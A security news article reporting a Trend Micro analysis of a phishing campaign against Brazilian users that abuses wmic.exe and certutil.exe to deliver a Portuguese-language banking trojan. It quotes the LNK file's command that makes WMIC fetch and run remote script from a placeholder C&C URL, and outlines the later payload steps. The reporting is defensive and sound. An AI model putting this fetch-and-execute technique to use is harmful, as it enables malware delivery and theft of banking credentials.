Saturday, October 12, 2024
HomeComputer SecurityNew Malware Abusing Two Legitimate Windows Files to Steal Victims Personal Data

New Malware Abusing Two Legitimate Windows Files to Steal Victims Personal Data

Published on

Malware protection

Researchers discovered a new malware that abusing two legitimate windows files and use it against compromised victims to steal sensitive information.

One file wmic.exe is a command line utility and the other file certutil.exe is a program that manages certificates for Windows.

These files are used for download the payload on the infected windows machine and also other files that later used for malicious purpose.

- Advertisement - SIEM as a Service

Attackers using more evasion techniques in this campaign and both files are already used by other malware but current attack integrate both files.

Researchers believe that the cybercriminals behind the malware attack using powerful tools and techniques to perform more stealthy operations.

How Does this Malware Abusing Legitimate Windows files

The initial stage of infection starts from the malicious email campaign that targeting users along with urgency notification content of postal service of Brazil to trick users to click the links inside of the email that posed as users missed the postal delivery attempt.

Attacker trick user to click the embedded link by saying that they can find the more details by clicking the link.

Once the victims click the link and the new windows pop-up that attempts to download a malicious Zip file.

According to Trend Micro report,Once the zip file is downloaded and extracted, the user will be presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file will then point to cmd.exe using the following parameter:
/k start /MIN %WINDIR$\\system32\\wbem\\WMIC.exe os get /format {URL} && exit
The cmd.exe is responsible for executing wmic.exe via the following parameter:
os get /format {URL}

After the execution of cmd.exe attempt to download and execute the command from its command & control server.

It drops the copy of the Windows Files certutil.exe in the %temp% folder in a different name and the next process involved to make an attempt to communicate with the new C&C server to download a new set of files.

Here comes the main payload which detected as TSPY_GUILDMA.C by Trend Micro and the researchers believes that the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese.

Finally, the Payload will be executed on victims machine using regsvr32.exe to steal banking information such as transaction details and login credentials.

Also Read:

New Adwind RAT Attack Linux, Windows and Mac via DDE Code Injection Technique by Evading Antivirus Software

Java Usage Tracker Critical Flaw Enable Hackers to Inject Arbitrary Files on Windows Systems

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Threat Actor ProKYC Selling Tools To Bypass Two-Factor Authentication

Threat actors are leveraging a newly discovered deepfake tool, ProKYC, to bypass two-factor authentication...

Mozilla Warns Of Firefox Zero-Day Actively Exploited In Cyber Attacks

A critical use-after-free vulnerability affecting Firefox and Firefox Extended Support Release (ESR) is being...

SpyCloud Embeds Identity Analytics in Cybercrime Investigations Solution to Accelerate Insider and Supply Chain Risk Analysis & Threat Actor Attribution

IDLink, SpyCloud’s new automated digital identity correlation capability, is now core to its industry-leading...

Abusix and Red Sift Form New Partnership, Leveraging Automation to Mitigate Cyber Attacks

The agreement has marked over 600,000 fraudulent domains for takedown in just two months...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Threat Actor ProKYC Selling Tools To Bypass Two-Factor Authentication

Threat actors are leveraging a newly discovered deepfake tool, ProKYC, to bypass two-factor authentication...

Hackers Exploiting Zero-day Flaw in Qualcomm Chips to Attack Android Users

Hackers exploit a zero-day vulnerability found in Qualcomm chipsets, potentially affecting millions worldwide.The flaw,...

Foxit PDF Reader Vulnerability Let Attackers Execute Arbitary Code

Researchers recently disclosed six new security vulnerabilities across various software, as one critical vulnerability...